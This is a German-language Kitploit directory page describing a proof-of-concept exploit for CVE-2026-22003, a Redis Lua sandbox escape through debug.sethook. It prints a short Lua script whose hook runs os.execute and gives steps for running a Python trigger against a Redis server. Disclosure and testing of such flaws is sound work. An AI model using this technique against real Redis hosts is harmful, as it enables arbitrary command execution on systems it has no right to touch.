Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — Proof-of-Concept-Exploit für CVE-2026-22003, der die Redis-Lua-Sandbox-Umgehung über debug.sethook demonstriert, um beliebige Systembefehle auszuführen. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
Privilege EscalationSchwachstellenanalyseExploitationDatenbanksicherheitAdversarial-Angriff
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

Proof-of-Concept-Exploit für CVE-2026-22003, der die Redis-Lua-Sandbox-Umgehung über debug.sethook demonstriert, um beliebige Systembefehle auszuführen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 1 MonatNoch nicht geprüft

CVE-2026-22003 – Redis-Lua-Sandbox-Escape über debug.sethook

Programmcode (Lua + Python-Trigger)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – Redis-Lua-Sandbox-Escape über debug.sethook

Severity: Critical

Überblick

Die Redis-Lua-Sandbox deaktiviert die Funktion debug.sethook nicht ordnungsgemäß. Ein Angreifer, der Lua-Skripte ausführen kann, kann einen Hook installieren, der in einem privilegierten Kontext ausgeführt wird, und die Sandbox verlassen, um beliebige Systembefehle auszuführen.

Details zur Schwachstelle

  • Typ: Sandbox-Escape
  • Auswirkung: Remotecodeausführung auf dem Redis-Host.
  • Grundursache: Die Debug-Bibliothek der Lua-Umgebung bleibt zugänglich, sodass Hooks os.execute oder ähnliche Funktionen aufrufen können.

Exploit-Demonstration

  1. Starten Sie einen Redis-Server (mit Standardkonfiguration, die EVAL erlaubt).
  2. Führen Sie den Exploit aus:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

Die Datei /tmp/redis_escape wird erstellt, was die Befehlsausführung beweist.

Tool herunterladen